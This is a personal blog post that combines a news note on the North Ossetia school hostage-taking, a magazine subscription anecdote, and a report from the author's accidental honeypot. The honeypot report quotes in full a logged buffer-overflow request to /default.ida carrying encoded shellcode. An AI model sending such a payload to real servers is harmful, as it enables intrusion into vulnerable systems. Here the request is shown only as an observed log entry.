Automated Black Hat

Just to support my “occupy land == bad”-theory posted yesterday, seventeen men and women seized a school in North Ossetia in Russia this morning, taking about 150 people hostage.

The attackers’ demands are said to include the withdrawal of Russia troops from neighbouring Chechnya.

Read the whole story over at BBC News. And probably on most other online newspapers. If you live in Russia, you can follow the situation live on television.

Last week I told you about my failed attempt to subscribe to Wired. I received a letter saying that my credit card had been declined. I never got around to give subscribing a second try, which turned out to be a good thing, since a copy of the September issue of Wired was laying in my mailbox when I got home from work today. Maybe they decided to treat me with one year’s worth of free copies?

My involuntary honeypot at work is still active, and today it was actually subject to an attempted buffer overflow attack. The following request was sent to the server:

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u780
1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

Notice the huge number of Xs filling the server buffer, and the rest of the request probably being code the attacker wanted to execute when the buffer overflowed. I have no idea what would have happened if the attacker had been able to execute the code, I only know that my server is too dumb to do anything but return a 405 error message.

The IP address (211.153.188.82) actually belongs to the 26st Primary School in Beijing. The Chinese are certainly starting to teach their hackers the trade at an early stage.

Dyana from Cali es Cali (www.caliescali.com)

Feedback

Do you have any thoughts you want to share? A question, maybe? Or is something in this post just plainly wrong? Then please send an e-mail to vegard at vegard dot net with your input. You can also use any of the other points of contact listed on the About page.

Caution

It looks like you're using Google's Chrome browser, which records everything you do on the internet. Personally identifiable and sensitive information about you is then sold to the highest bidder, making you a part of surveillance capitalism.

The Contra Chrome comic explains why this is bad, and why you should use another browser.